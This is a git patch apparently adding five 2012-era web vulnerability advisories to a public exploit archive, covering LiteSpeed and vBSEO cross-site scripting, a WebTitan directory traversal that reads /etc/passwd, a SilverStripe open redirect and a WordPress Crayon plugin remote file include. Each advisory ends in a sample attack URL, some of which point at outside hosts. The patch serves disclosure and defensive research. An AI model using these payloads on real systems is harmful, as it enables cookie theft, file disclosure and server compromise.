From 94f93b8c9abd866796a502324fdb7376c10cf877 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 24 Aug 2015 05:01:58 +0000 Subject: [PATCH] DB: 2015-08-24 5 new exploits --- files.csv | 5 +++++ platforms/multiple/remote/37947.txt | 9 +++++++++ platforms/php/webapps/37943.txt | 9 +++++++++ platforms/php/webapps/37944.txt | 11 +++++++++++ platforms/php/webapps/37945.txt | 9 +++++++++ platforms/php/webapps/37946.txt | 9 +++++++++ 6 files changed, 52 insertions(+) create mode 100755 platforms/multiple/remote/37947.txt create mode 100755 platforms/php/webapps/37943.txt create mode 100755 platforms/php/webapps/37944.txt create mode 100755 platforms/php/webapps/37945.txt create mode 100755 platforms/php/webapps/37946.txt diff --git a/files.csv b/files.csv index d430e6272..2839bd36b 100755 --- a/files.csv +++ b/files.csv @@ -34082,6 +34082,7 @@ id,file,description,date,author,platform,type,port 37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0 37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 37755,platforms/windows/local/37755.c,"Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0 +37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting Vulnerability",2012-03-12,K1P0D,multiple,remote,0 37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit",2015-08-12,"David Bloom",multiple,webapps,0 37758,platforms/win32/shellcode/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ (199 Bytes Null-Free)",2015-08-12,noviceflux,win32,shellcode,0 37759,platforms/linux/dos/37759.py,"NeuroServer 0.7.4 - (EEG TCP/IP Transceiver) Remote DoS",2015-08-12,nitr0us,linux,dos,0 @@ -34124,6 +34125,10 @@ id,file,description,date,author,platform,type,port 37940,platforms/php/webapps/37940.txt,"SenseSites CommonSense CMS cat2.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37941,platforms/php/webapps/37941.txt,"SenseSites CommonSense CMS special.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS article.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 +37943,platforms/php/webapps/37943.txt,"WebTitan 'logs-x.php' Directory Traversal Vulnerability",2012-10-20,"Richard Conner",php,webapps,0 +37944,platforms/php/webapps/37944.txt,"vBSEO 'u' parameter Cross Site Scripting Vulnerability",2012-06-16,MegaMan,php,webapps,0 +37945,platforms/php/webapps/37945.txt,"SilverStripe 2.4.x 'BackURL' Parameter URI Redirection Vulnerability",2012-10-15,"Aung Khant",php,webapps,0 +37946,platforms/php/webapps/37946.txt,"WordPress Crayon Syntax Highlighter Plugin 'wp_load' Parameter Remote File Include Vulnerabilities",2012-10-15,"Charlie Eriksen",php,webapps,0 37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - .pls Local Crash PoC",2015-08-17,St0rn,windows,dos,0 37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & SAFESEH bypass)",2015-08-17,St0rn,windows,local,0 37800,platforms/windows/remote/37800.php,"Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)",2015-08-17,"Mohammad Reza Espargham",windows,remote,0 diff --git a/platforms/multiple/remote/37947.txt b/platforms/multiple/remote/37947.txt new file mode 100755 index 000000000..7f77d4d1a --- /dev/null +++ b/platforms/multiple/remote/37947.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/55946/info + +LiteSpeed Web Server is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +LiteSpeed Web Server 4.1.11 and prior versions are vulnerable. + +http://www.exxample.com/service/graph_html.php?gtitle=VHOSTa%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37943.txt b/platforms/php/webapps/37943.txt new file mode 100755 index 000000000..3ebf4586b --- /dev/null +++ b/platforms/php/webapps/37943.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/55904/info + +WebTitan is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. + +A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files containing sensitive information that could aid in further attacks. + +WebTitan Versions prior to 3.60 are vulnerable. + +http://www.example.com//logs-x.php? jaction=view&fname=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/37944.txt b/platforms/php/webapps/37944.txt new file mode 100755 index 000000000..f51c12414 --- /dev/null +++ b/platforms/php/webapps/37944.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/55908/info + +vBSEO is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +vBSEO 3.8.7 is vulnerable; other versions may also be affected. + +http://www.example.com/forums/member.php?tab=friends&u=11411%22%3E%3Cscript%3Ewindow.location%20=%20%22http://www.internot.info/forum/%22%20%3C/script%3E + +http://www.example.com/forum/member.php?u=1%22%3E%3Cscript%3Ewindow.location%20=%20%22http://www.internot.info/forum/%22%20%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37945.txt b/platforms/php/webapps/37945.txt new file mode 100755 index 000000000..8fa2d181c --- /dev/null +++ b/platforms/php/webapps/37945.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/55915/info + +SilverStripe is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. + +A successful exploit may aid in phishing attacks; other attacks are possible. + +SilverStripe 2.4.7 and prior are vulnerable. + +http://www.example.com/index.php/Security/login?BackURL=http://example1.com \ No newline at end of file diff --git a/platforms/php/webapps/37946.txt b/platforms/php/webapps/37946.txt new file mode 100755 index 000000000..73b49b7a9 --- /dev/null +++ b/platforms/php/webapps/37946.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/55919/info + +The Crayon Syntax Highlighter plug-in for WordPress is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these issues may allow a remote attacker to obtain sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. + +Crayon Syntax Highlighter 1.12.1 is vulnerable; other versions may also be affected. + +http://www.example.com/wordpress/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=ftp://192.168.80.201/wp-load.php \ No newline at end of file